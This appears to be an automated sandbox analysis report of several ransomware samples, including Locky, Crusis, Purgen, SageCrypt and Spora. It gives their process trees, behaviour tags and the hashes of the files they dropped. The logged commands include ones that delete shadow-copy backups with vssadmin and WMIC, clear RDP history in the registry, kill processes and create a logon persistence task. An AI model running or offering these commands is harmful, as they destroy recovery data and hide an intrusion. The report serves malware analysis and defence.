        • C:\Users\Admin\AppData\Local\Temp\Stp8C0A_TMP.EXE
          "C:\Users\Admin\AppData\Local\Temp\Stp8C0A_TMP.EXE"
          4⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • System Location Discovery: System Language Discovery
          PID:404
          • C:\Users\Admin\AppData\Local\Temp\is-CHLB0.tmp\Stp8C0A_TMP.tmp
            "C:\Users\Admin\AppData\Local\Temp\is-CHLB0.tmp\Stp8C0A_TMP.tmp" /SL5="$2020C,1298881,57856,C:\Users\Admin\AppData\Local\Temp\Stp8C0A_TMP.EXE"
            5⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • System Location Discovery: System Language Discovery
            • Suspicious use of FindShellTrayWindow
            PID:3368
            • C:\Program Files\Internet Explorer\iexplore.exe
              "C:\Program Files\Internet Explorer\iexplore.exe" http://www.gimespace.com/thankyou.html
              6⤵
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • Modifies Internet Explorer settings
              • Suspicious use of FindShellTrayWindow
              • Suspicious use of SetWindowsHookEx
              PID:4504
              • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4504 CREDAT:275457 /prefetch:2
                7⤵
                • System Location Discovery: System Language Discovery
                • Modifies Internet Explorer settings
                • Suspicious use of SetWindowsHookEx
                PID:4648
      • C:\Users\Admin\Desktop\00305\Trojan-Ransom.Win32.Blocker.meia-8e4fd1b159fa4ba82abf469335fe217506670d0983d067d0733351d7c42130fe.exe
        Trojan-Ransom.Win32.Blocker.meia-8e4fd1b159fa4ba82abf469335fe217506670d0983d067d0733351d7c42130fe.exe
        3⤵
        • Executes dropped EXE
        • Adds Run key to start application
        • Suspicious use of SetThreadContext
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: CmdExeWriteProcessMemorySpam
        • Suspicious behavior: MapViewOfSection
        PID:684
        • C:\Windows\SysWOW64\explorer.exe
          "C:\Windows\system32\explorer.exe"
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of AdjustPrivilegeToken
          PID:2584
      • C:\Users\Admin\Desktop\00305\Trojan-Ransom.Win32.Crusis.to-9a4e83046bf3eeb98e269c51654e5c31b1d353ff9b7af4d0f6dab4d8aaadaf01.exe
        Trojan-Ransom.Win32.Crusis.to-9a4e83046bf3eeb98e269c51654e5c31b1d353ff9b7af4d0f6dab4d8aaadaf01.exe
        3⤵
        • Drops startup file
        • Executes dropped EXE
        • Adds Run key to start application
        • Drops desktop.ini file(s)
        • Drops file in System32 directory
        • Drops file in Program Files directory
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: CmdExeWriteProcessMemorySpam
        PID:596
        • C:\Windows\system32\cmd.exe
          "C:\Windows\system32\cmd.exe"
          4⤵
            PID:712
            • C:\Windows\system32\mode.com
              mode con cp select=1251
              5⤵
                PID:2148
              • C:\Windows\system32\vssadmin.exe
                vssadmin delete shadows /all /quiet
                5⤵
                • Suspicious use of NtSetInformationThreadHideFromDebugger
                • Interacts with shadow copies
                PID:3920
            • C:\Windows\system32\cmd.exe
              "C:\Windows\system32\cmd.exe"
              4⤵
                PID:4884
                • C:\Windows\system32\mode.com
                  mode con cp select=1251
                  5⤵
                    PID:3840
                  • C:\Windows\system32\vssadmin.exe
                    vssadmin delete shadows /all /quiet
                    5⤵
                    • Interacts with shadow copies
                    PID:3512
                • C:\Windows\System32\mshta.exe
                  "C:\Windows\System32\mshta.exe" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Info.hta"
                  4⤵
                  • Modifies Internet Explorer settings
                  PID:4732
                • C:\Windows\System32\mshta.exe
                  "C:\Windows\System32\mshta.exe" "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Info.hta"
                  4⤵
                  • Modifies Internet Explorer settings
                  PID:4104
              • C:\Users\Admin\Desktop\00305\Trojan-Ransom.Win32.Crypmod.yst-25753eae209d8552a8a43cbf9f796798409db5271527086794c1428ff4a384e6.exe
                Trojan-Ransom.Win32.Crypmod.yst-25753eae209d8552a8a43cbf9f796798409db5271527086794c1428ff4a384e6.exe
                3⤵
                • Executes dropped EXE
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: CmdExeWriteProcessMemorySpam
                PID:2384
              • C:\Users\Admin\Desktop\00305\Trojan-Ransom.Win32.Foreign.nwbs-18e67c83ac62ee830568249b34d59e49d85a5847ea41caa332db53ace30c8d78.exe
                Trojan-Ransom.Win32.Foreign.nwbs-18e67c83ac62ee830568249b34d59e49d85a5847ea41caa332db53ace30c8d78.exe
                3⤵
                • Executes dropped EXE
                • Writes to the Master Boot Record (MBR)
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: CmdExeWriteProcessMemorySpam
                PID:2620
              • C:\Users\Admin\Desktop\00305\Trojan-Ransom.Win32.Foreign.nwcz-a7c3f44433ee74b7e79973b627a33425e5d88b3860a737a7530b5db51a16dadd.exe
                Trojan-Ransom.Win32.Foreign.nwcz-a7c3f44433ee74b7e79973b627a33425e5d88b3860a737a7530b5db51a16dadd.exe
                3⤵
                • Executes dropped EXE
                • Adds Run key to start application
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: CmdExeWriteProcessMemorySpam
                PID:1624
                • C:\Windows\SysWOW64\cmd.exe
                  cmd /c ""C:\Users\Admin\AppData\Local\Temp\6B12\31.bat" "C:\Users\Admin\AppData\Roaming\appmdemx\dmutters.exe" "C:\Users\Admin\Desktop\00305\TRF7C5~1.EXE""
                  4⤵
                  • System Location Discovery: System Language Discovery
                  PID:2856
                  • C:\Windows\SysWOW64\cmd.exe
                    cmd /C ""C:\Users\Admin\AppData\Roaming\appmdemx\dmutters.exe" "C:\Users\Admin\Desktop\00305\TRF7C5~1.EXE""
                    5⤵
                    • Loads dropped DLL
                    • System Location Discovery: System Language Discovery
                    PID:3828
                    • C:\Users\Admin\AppData\Roaming\appmdemx\dmutters.exe
                      "C:\Users\Admin\AppData\Roaming\appmdemx\dmutters.exe" "C:\Users\Admin\Desktop\00305\TRF7C5~1.EXE"
                      6⤵
                      • Executes dropped EXE
                      • Suspicious use of SetThreadContext
                      • System Location Discovery: System Language Discovery
                      • Suspicious behavior: MapViewOfSection
                      PID:1148
                      • C:\Windows\system32\svchost.exe
                        C:\Windows\system32\svchost.exe
                        7⤵
                        • Suspicious use of SetThreadContext
                        • Suspicious behavior: MapViewOfSection
                        PID:4516
              • C:\Users\Admin\Desktop\00305\Trojan-Ransom.Win32.Locky.a-1a7587dea4824ef2d6b3cf623493cb2dfd17f534458c55521c6ada2d4a70cfee.exe
                Trojan-Ransom.Win32.Locky.a-1a7587dea4824ef2d6b3cf623493cb2dfd17f534458c55521c6ada2d4a70cfee.exe
                3⤵
                • Executes dropped EXE
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: CmdExeWriteProcessMemorySpam
                PID:2864
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 2864 -s 164
                  4⤵
                  • Loads dropped DLL
                  • Program crash
                  PID:1784
              • C:\Users\Admin\Desktop\00305\Trojan-Ransom.Win32.Locky.addj-0a3b93e2d8c5a496b35c882a6c6529d1b36099da7096610fbde6c2d72a266544.exe
                Trojan-Ransom.Win32.Locky.addj-0a3b93e2d8c5a496b35c882a6c6529d1b36099da7096610fbde6c2d72a266544.exe
                3⤵
                • Executes dropped EXE
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: CmdExeWriteProcessMemorySpam
                PID:2868
              • C:\Users\Admin\Desktop\00305\Trojan-Ransom.Win32.Purgen.acv-8a3bb389250521dc4914542fde8d015fb47925b78dd74e7e04302d7402411777.exe
                Trojan-Ransom.Win32.Purgen.acv-8a3bb389250521dc4914542fde8d015fb47925b78dd74e7e04302d7402411777.exe
                3⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Suspicious use of SetThreadContext
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: CmdExeWriteProcessMemorySpam
                • Suspicious behavior: MapViewOfSection
                PID:1316
                • C:\Users\Admin\Desktop\00305\Trojan-Ransom.Win32.Purgen.acv-8a3bb389250521dc4914542fde8d015fb47925b78dd74e7e04302d7402411777.exe
                  Trojan-Ransom.Win32.Purgen.acv-8a3bb389250521dc4914542fde8d015fb47925b78dd74e7e04302d7402411777.exe
                  4⤵
                  • Executes dropped EXE
                  • Adds Run key to start application
                  • Drops desktop.ini file(s)
                  • Drops file in Program Files directory
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: RenamesItself
                  PID:2980
                  • C:\Windows\SysWOW64\taskkill.exe
                    taskkill /F /T /PID 2620
                    5⤵
                    • System Location Discovery: System Language Discovery
                    • Kills process with taskkill
                    • Suspicious use of AdjustPrivilegeToken
                    PID:1872
                  • C:\Windows\SysWOW64\taskkill.exe
                    taskkill /F /T /PID 2872
                    5⤵
                    • System Location Discovery: System Language Discovery
                    • Kills process with taskkill
                    • Suspicious use of AdjustPrivilegeToken
                    PID:1992
                  • C:\Windows\SysWOW64\cmd.exe
                    cmd /c C:\Users\Admin\AppData\Local\Temp\tmpBCE9.tmp.bat
                    5⤵
                    • System Location Discovery: System Language Discovery
                    PID:3156
                    • C:\Windows\SysWOW64\vssadmin.exe
                      vssadmin.exe Delete Shadows /All /Quiet
                      6⤵
                      • System Location Discovery: System Language Discovery
                      • Interacts with shadow copies
                      PID:6460
                    • C:\Windows\SysWOW64\reg.exe
                      reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default" /va /f
                      6⤵
                      • Clears Network RDP Connection History and Configurations
                      • System Location Discovery: System Language Discovery
                      PID:3860
                    • C:\Windows\SysWOW64\reg.exe
                      reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" /f
                      6⤵
                      • Clears Network RDP Connection History and Configurations
                      • System Location Discovery: System Language Discovery
                      PID:3432
                    • C:\Windows\SysWOW64\reg.exe
                      reg add "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers"
                      6⤵
                      • System Location Discovery: System Language Discovery
                      PID:7084
                  • C:\Windows\SysWOW64\cmd.exe
                    "C:\Windows\system32\cmd.exe" /c del C:\Users\Admin\Desktop\00305\Trojan-Ransom.Win32.Purgen.acv-8a3bb389250521dc4914542fde8d015fb47925b78dd74e7e04302d7402411777.exe > nul
                    5⤵
                    • System Location Discovery: System Language Discovery
                    PID:4444
              • C:\Users\Admin\Desktop\00305\Trojan-Ransom.Win32.Purgen.afn-789a25139cfffaf8c6ae3cd914c0df394e8bb252d39ede7783f406310a7ed98d.exe
                Trojan-Ransom.Win32.Purgen.afn-789a25139cfffaf8c6ae3cd914c0df394e8bb252d39ede7783f406310a7ed98d.exe
                3⤵
                • Executes dropped EXE
                • Adds Run key to start application
                • Drops desktop.ini file(s)
                • Drops file in Program Files directory
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: CmdExeWriteProcessMemorySpam
                PID:1848
                • C:\Windows\SysWOW64\taskkill.exe
                  taskkill /F /T /PID 800
                  4⤵
                  • System Location Discovery: System Language Discovery
                  • Kills process with taskkill
                  • Suspicious use of AdjustPrivilegeToken
                  PID:3692
                • C:\Windows\SysWOW64\taskkill.exe
                  taskkill /F /T /PID 2620
                  4⤵
                  • System Location Discovery: System Language Discovery
                  • Kills process with taskkill
                  • Suspicious use of AdjustPrivilegeToken
                  PID:4052
                • C:\Windows\SysWOW64\taskkill.exe
                  taskkill /F /T /PID 2864
                  4⤵
                  • System Location Discovery: System Language Discovery
                  • Kills process with taskkill
                  • Suspicious use of AdjustPrivilegeToken
                  PID:4060
                • C:\Windows\SysWOW64\taskkill.exe
                  taskkill /F /T /PID 2872
                  4⤵
                  • System Location Discovery: System Language Discovery
                  • Kills process with taskkill
                  • Suspicious use of AdjustPrivilegeToken
                  PID:4068
                • C:\Windows\SysWOW64\cmd.exe
                  cmd /c C:\Users\Admin\AppData\Local\Temp\tmpBCCA.tmp.bat
                  4⤵
                  • System Location Discovery: System Language Discovery
                  PID:2612
                  • C:\Windows\SysWOW64\vssadmin.exe
                    vssadmin.exe Delete Shadows /All /Quiet
                    5⤵
                    • System Location Discovery: System Language Discovery
                    • Interacts with shadow copies
                    PID:4692
                  • C:\Windows\SysWOW64\reg.exe
                    reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default" /va /f
                    5⤵
                    • Clears Network RDP Connection History and Configurations
                    • System Location Discovery: System Language Discovery
                    PID:5800
                  • C:\Windows\SysWOW64\reg.exe
                    reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" /f
                    5⤵
                    • Clears Network RDP Connection History and Configurations
                    • System Location Discovery: System Language Discovery
                    PID:3856
                  • C:\Windows\SysWOW64\reg.exe
                    reg add "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers"
                    5⤵
                    • System Location Discovery: System Language Discovery
                    PID:7160
                  • C:\Windows\SysWOW64\attrib.exe
                    attrib Default.rdp -s -h
                    5⤵
                    • System Location Discovery: System Language Discovery
                    • Views/modifies file attributes
                    PID:6136
                • C:\Windows\SysWOW64\cmd.exe
                  "C:\Windows\system32\cmd.exe" /c del C:\Users\Admin\Desktop\00305\Trojan-Ransom.Win32.Purgen.afn-789a25139cfffaf8c6ae3cd914c0df394e8bb252d39ede7783f406310a7ed98d.exe > nul
                  4⤵
                  • System Location Discovery: System Language Discovery
                  PID:4184
              • C:\Users\Admin\Desktop\00305\Trojan-Ransom.Win32.SageCrypt.dxm-1740a6d5c4c75c8c22aab932a5d920e04d7da1ac5f17c5a1776ca53ff6817eeb.exe
                Trojan-Ransom.Win32.SageCrypt.dxm-1740a6d5c4c75c8c22aab932a5d920e04d7da1ac5f17c5a1776ca53ff6817eeb.exe
                3⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Enumerates connected drives
                • Sets desktop wallpaper using registry
                • System Location Discovery: System Language Discovery
                • Modifies Control Panel
                • Modifies data under HKEY_USERS
                • Modifies registry class
                • Suspicious behavior: CmdExeWriteProcessMemorySpam
                PID:1960
                • C:\Users\Admin\Desktop\00305\Trojan-Ransom.Win32.SageCrypt.dxm-1740a6d5c4c75c8c22aab932a5d920e04d7da1ac5f17c5a1776ca53ff6817eeb.exe
                  "C:\Users\Admin\Desktop\00305\Trojan-Ransom.Win32.SageCrypt.dxm-1740a6d5c4c75c8c22aab932a5d920e04d7da1ac5f17c5a1776ca53ff6817eeb.exe" g
                  4⤵
                  • Executes dropped EXE
                  • System Location Discovery: System Language Discovery
                  PID:3584
                • C:\Windows\SysWOW64\schtasks.exe
                  "C:\Windows\System32\schtasks.exe" /CREATE /TN "N0mFUQoa" /TR "C:\Users\Admin\AppData\Roaming\Rj3fNWF3.exe" /SC ONLOGON /RL HIGHEST /F
                  4⤵
                  • System Location Discovery: System Language Discovery
                  • Scheduled Task/Job: Scheduled Task
                  PID:3452
                • C:\Windows\SysWOW64\vssadmin.exe
                  "C:\Windows\System32\vssadmin.exe" delete shadows /all /quiet
                  4⤵
                  • System Location Discovery: System Language Discovery
                  • Interacts with shadow copies
                  PID:4272
                • C:\Windows\SysWOW64\vssadmin.exe
                  "C:\Windows\System32\vssadmin.exe" delete shadows /all /quiet
                  4⤵
                  • System Location Discovery: System Language Discovery
                  • Interacts with shadow copies
                  PID:6828
                • C:\Windows\SysWOW64\vssadmin.exe
                  "C:\Windows\System32\vssadmin.exe" delete shadows /all /quiet
                  4⤵
                  • System Location Discovery: System Language Discovery
                  • Interacts with shadow copies
                  PID:6136
                • C:\Windows\SysWOW64\mshta.exe
                  "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\Desktop\!HELP_SOS.hta"
                  4⤵
                  • System Location Discovery: System Language Discovery
                  • Modifies Internet Explorer settings
                  PID:6776
                • C:\Windows\SysWOW64\WScript.exe
                  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\f1.vbs"
                  4⤵
                  • System Location Discovery: System Language Discovery
                  PID:3332
              • C:\Users\Admin\Desktop\00305\Trojan-Ransom.Win32.Spora.fqp-f4d03d9a317d344b3820b9c8a92ea0b70fb4a102f7769d8f0d70137728a02716.exe
                Trojan-Ransom.Win32.Spora.fqp-f4d03d9a317d344b3820b9c8a92ea0b70fb4a102f7769d8f0d70137728a02716.exe
                3⤵
                • Drops startup file
                • Executes dropped EXE
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: CmdExeWriteProcessMemorySpam
                PID:1048
                • C:\Windows\SysWOW64\wbem\WMIC.exe
                  "C:\Windows\System32\wbem\WMIC.exe" process call create "cmd.exe /c vssadmin.exe delete shadows /quiet /all"
                  4⤵
                  • System Location Discovery: System Language Discovery
                  • Suspicious use of AdjustPrivilegeToken
                  PID:2228
                • C:\Program Files\Internet Explorer\iexplore.exe
                  "C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\Admin\Desktop\USDCE-40FZT-XTXTX-HTRAT-FYYYY.html
                  4⤵
                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                  • Modifies Internet Explorer settings
                  • Suspicious use of FindShellTrayWindow
                  • Suspicious use of SetWindowsHookEx
                  PID:2668
                  • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                    "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2668 CREDAT:340993 /prefetch:2
                    5⤵
                    • System Location Discovery: System Language Discovery
                    • Modifies Internet Explorer settings
                    • Suspicious use of SetWindowsHookEx
                    PID:3636
            • C:\Windows\system32\rundll32.exe
              "C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\Admin\Desktop\ec73d977cb8b356d25.exe..doc.sage
              2⤵
              • Loads dropped DLL
              • Modifies registry class
              PID:5872
          • C:\Windows\system32\DllHost.exe
            C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
            1⤵
              PID:1520
            • C:\Windows\system32\conhost.exe
              \??\C:\Windows\system32\conhost.exe "564631815-1625734786-1395133699-1442906001133204017111782137819949445391162632363"
              1⤵
                PID:1696
              • C:\Windows\system32\conhost.exe
                \??\C:\Windows\system32\conhost.exe "1388664262-662701517197137812-4742632101754034137-2016369431467688679-1935951178"
                1⤵
                • Suspicious use of SetWindowsHookEx
                PID:2516
              • C:\Windows\system32\conhost.exe
                \??\C:\Windows\system32\conhost.exe "-452509443416002932-1211839594-1787379265-17532775911697870240-296921374478930046"
                1⤵
                • Suspicious use of NtSetInformationThreadHideFromDebugger
                PID:2552
              • C:\Windows\system32\conhost.exe
                \??\C:\Windows\system32\conhost.exe "-34427279413362099161021340166-341098458-501772003-14070686471316075724-1769033857"
                1⤵
                • Suspicious use of NtSetInformationThreadHideFromDebugger
                PID:4044
              • C:\Windows\system32\conhost.exe
                \??\C:\Windows\system32\conhost.exe "-16199857111138463448-1092043548-9369257901702126591-20936184471927088501-1106874467"
                1⤵
                  PID:2728
                • C:\Windows\system32\vssvc.exe
                  C:\Windows\system32\vssvc.exe
                  1⤵
                  • Suspicious use of AdjustPrivilegeToken
                  PID:5112
                • C:\Windows\system32\DllHost.exe
                  C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}
                  1⤵
                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                  PID:2992
                • C:\Windows\system32\DllHost.exe
                  C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
                  1⤵
                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                  PID:3448
                • C:\Windows\system32\conhost.exe
                  \??\C:\Windows\system32\conhost.exe "-12670315194819361681052662842671939291833789914588274842-18741156861308169480"
                  1⤵
                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                  PID:2896
                • C:\Windows\system32\conhost.exe
                  \??\C:\Windows\system32\conhost.exe "-613636967756584310-11672489671315954411995040261-28473864915921382881449474050"
                  1⤵
                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                  PID:3788
                • C:\Windows\system32\conhost.exe
                  \??\C:\Windows\system32\conhost.exe "-190872407618831945891901738077-1981721769-1853025298-328275442-208092531193322556"
                  1⤵
                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                  PID:4088
                • C:\Windows\system32\cmd.exe
                  cmd.exe /c vssadmin.exe delete shadows /quiet /all
                  1⤵
                  • Process spawned unexpected child process
                  PID:3460
                  • C:\Windows\system32\vssadmin.exe
                    vssadmin.exe delete shadows /quiet /all
                    2⤵
                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                    • Interacts with shadow copies
                    PID:2320
                • C:\Windows\system32\conhost.exe
                  \??\C:\Windows\system32\conhost.exe "16261399242073487749-1548879646-658611682-15592484479962655375200633071252193655"
                  1⤵
                    PID:4388
                  • C:\Windows\system32\DllHost.exe
                    C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}
                    1⤵
                      PID:5276
                    • C:\Windows\system32\DllHost.exe
                      C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
                      1⤵
                        PID:6540
                      • C:\Windows\system32\DllHost.exe
                        C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}
                        1⤵
                          PID:6156
                        • C:\Windows\SysWOW64\DllHost.exe
                          C:\Windows\SysWOW64\DllHost.exe /Processid:{3F6B5E16-092A-41ED-930B-0B4125D91D4E}
                          1⤵
                          • System Location Discovery: System Language Discovery
                          PID:1840
                        • C:\Windows\system32\DllHost.exe
                          C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}
                          1⤵
                            PID:3372
                          • C:\Windows\system32\DllHost.exe
                            C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}
                            1⤵
                              PID:5684
                            • C:\Windows\system32\DllHost.exe
                              C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}
                              1⤵
                                PID:6724
                              • C:\Windows\system32\DllHost.exe
                                C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}
                                1⤵
                                  PID:3304
                                • C:\Windows\system32\conhost.exe
                                  \??\C:\Windows\system32\conhost.exe "-1345571784-13979710921620767591024303777-15937469921008365177240390915-1514196653"
                                  1⤵
                                    PID:3572
                                  • C:\Windows\system32\DllHost.exe
                                    C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}
                                    1⤵
                                      PID:6884
                                    • C:\Windows\system32\DllHost.exe
                                      C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}
                                      1⤵
                                        PID:6636
                                      • C:\Windows\system32\DllHost.exe
                                        C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}
                                        1⤵
                                          PID:3800

                                        Network

                                        MITRE ATT&CK Enterprise v15

                                        Replay Monitor

                                        Loading Replay Monitor...

                                        Downloads

                                        • C:\MSOCache\All Users\{90140000-0011-0000-0000-0000000FF1CE}-C\ProPlusWW.msi.id-1B6BAB44.[[email protected]].arena

                                          Filesize

                                          24.4MB

                                          MD5

                                          372500d9934a6e0f5eb64f26d9d1c00e

                                          SHA1

                                          381e476b53b7f31db12456b37ab5a41585ce1ac5

                                          SHA256

                                          7b8a82874310e7071f029a566107c514dfd28de8d854b93bf8fb3e0173bab17e

                                          SHA512

                                          de385e59d0c00e9943fc15eaf72bc88c5ce83608e341803041003e80128fcb21b27c3f311b9ae981bd6aa802393d4b8f0ea8902617fdebef1c5fcf01c143d2da

                                        • C:\Program Files (x86)\GiMeSpace Desktop Extender 3D\GiMeSpace.exe

                                          Filesize

                                          1.8MB

                                          MD5

                                          2078928a0db550de9dfb8d44572994fb

                                          SHA1

                                          630c0fa70e1d0dd632648d728bbd9f8383c5aa58

                                          SHA256

                                          84fa97286f75bcb1931efa973731945d15769cf82a728f3523de370faa51ea31

                                          SHA512

                                          66666f46e9273597acd884de06c70db1a5e0555f2d32d6ab2d22a3f25ef7d6ad9ff29a2eb6886b7349cd1bd73722a6a62b9a8e8c3a1a92a355614dbf78cf4c1b

                                        • C:\ProgramData\Package Cache\{4d8dcf8c-a72a-43e1-9833-c12724db736e}\Read___ME.html

                                          Filesize

                                          4KB

                                          MD5

                                          0c315a9a8c8940b370675c8d4e23c4d3

                                          SHA1

                                          43feccf40451474344b0cf5898f233636dedab94

                                          SHA256

                                          bb16a4123ce1a1ebfbce23cc04cd9cfcc680c3a1e8e9ab565c15d7d70f2af0f3

                                          SHA512

                                          10f8929288c5af488f47730d885e55c7991f558942675e64006fd6b2d796a012e78269bb7543e024f9a8c39ee50af882f9417f6cfbb92f0af9689d4784bb9c6d

                                        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\3C428B1A3E5F57D887EC4B864FAC5DCC

                                          Filesize

                                          914B

                                          MD5

                                          e4a68ac854ac5242460afd72481b2a44

                                          SHA1

                                          df3c24f9bfd666761b268073fe06d1cc8d4f82a4

                                          SHA256

                                          cb3ccbb76031e5e0138f8dd39a23f9de47ffc35e43c1144cea27d46a5ab1cb5f

                                          SHA512

                                          5622207e1ba285f172756f6019af92ac808ed63286e24dfecc1e79873fb5d140f1ceb7133f2476e89a5f75f711f9813a9fbb8fd5287f64adfdcc53b864f9bdc5

                                        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F0ACCF77CDCBFF39F6191887F6D2D357

                                          Filesize

                                          1KB

                                          MD5

                                          a266bb7dcc38a562631361bbf61dd11b

                                          SHA1

                                          3b1efd3a66ea28b16697394703a72ca340a05bd5

                                          SHA256

                                          df545bf919a2439c36983b54cdfc903dfa4f37d3996d8d84b4c31eec6f3c163e

                                          SHA512

                                          0da8ef4f8f6ed3d16d2bc8eb816b9e6e1345dfe2d91160196c47e6149a1d6aedaafadcefd66acdea7f72dcf0832770192ceac15b0c559c4ccc2c0e5581d5aefc

                                        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\3C428B1A3E5F57D887EC4B864FAC5DCC

                                          Filesize

                                          252B

                                          MD5

                                          0947d999b9f09f290d01fd1e2aa5b29a

                                          SHA1

                                          74678791a2f8640ea2a1a9fb9a1fe0db0a95af52

                                          SHA256

                                          5a175b622873b5e4812502f67bab94f7597f45b69be5ef7eb0dc5e984f52ed38

                                          SHA512

                                          3a863f45fecc8bc887c98a38692229e82f4626511ba6a1cf7690e83d6a2df047c8ce16ce7551461c66ff28d2e8b510f230f436cae42d0984cc84068f54670aed

                                        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

                                          Filesize

                                          342B

                                          MD5

                                          6c70639062b076f585fe32ee54d8f3d1

                                          SHA1

                                          aebd7995ccf0299367577f9b654e05f73ee80757

                                          SHA256

                                          afaec4a2aab5c9bbf757f3c3bccf57564d1f082d8f6a1ae6769c02dbae081f46

                                          SHA512

                                          0c76f5125da4066ee85304362df6f55ba1823bbec184b1626fdb9b21fb318301a6fa338939ca84b7435feabbea18134c483d37d054320f8b402b9fa7653b7bb5

                                        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

                                          Filesize

                                          342B

                                          MD5

                                          15152fe1208c1ba13c281f03215c45a8

                                          SHA1

                                          ed41c982afc9dc0efedd38b6c5116a8e343f95a4

                                          SHA256

                                          adb2e6912868745d2464495c8cac4cc75c30e9eaee1ccc231fcf9e8745e1bc5e

                                          SHA512

                                          26f9aabbd0d65771233adf774ec30f77feabd3b938c6b552afeb5e3d2c05230ec483f33a3032c379b027e095451faa532e0f58f35898e8b5e4480c381de8cc72

                                        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

                                          Filesize

                                          342B

                                          MD5

                                          da53b532f8a248893f784e6091189edf

                                          SHA1

                                          0b738969cb9a5f171edcb499d41a99bcc3987eb4

                                          SHA256

                                          7d96fc537e8ecd8a2455337dc2bd548d747b022cb21f43b2a75b9ebcfde0ada3

                                          SHA512

                                          e47bf9e4b02ea93e08d832024c714aa3b4635b6a1040b20ad327fffe815fff36cd51017ccc115f61a8ea05c421c2cf784ddc0c7b38cad62cc3bcf5d4a948103a

                                        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

                                          Filesize

                                          342B

                                          MD5

                                          000379077b8319ad82b0ce31e26d8e64

                                          SHA1

                                          24ff52d480ae123dd09e476424e7cfbdf9ce2e52

                                          SHA256

                                          e1fc9c24b780bc15e126f7f13e37425b08c809b2b1ea59e0bdbcf9455a50ae68

                                          SHA512

                                          eaa634a75dc19f077492071343f35531d43825a9a040fd9f187ffd24ac8f675b4220d605c6a229bf934e9d1f57a727ba24f142449b00d230605dccd7147f5f26

                                        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

                                          Filesize

                                          342B

                                          MD5

                                          91023f988c8153b25b8becc924a4c237

                                          SHA1

                                          7ec96df0e8fbed9cb9a49b946c2199b810059038

                                          SHA256

                                          7ab32a4a6c733d39a8bb25f4a563502da78f64c2a942f3bc0b7f3442437b17a9

                                          SHA512

                                          6967832aace71a129e0b9810c29c1c0a7eb128925095d7a75c55549636ff0ebdc3c9018c677ea29ea8f9f2dba569b559c09f813741f1fa4bec8d78d50db076da

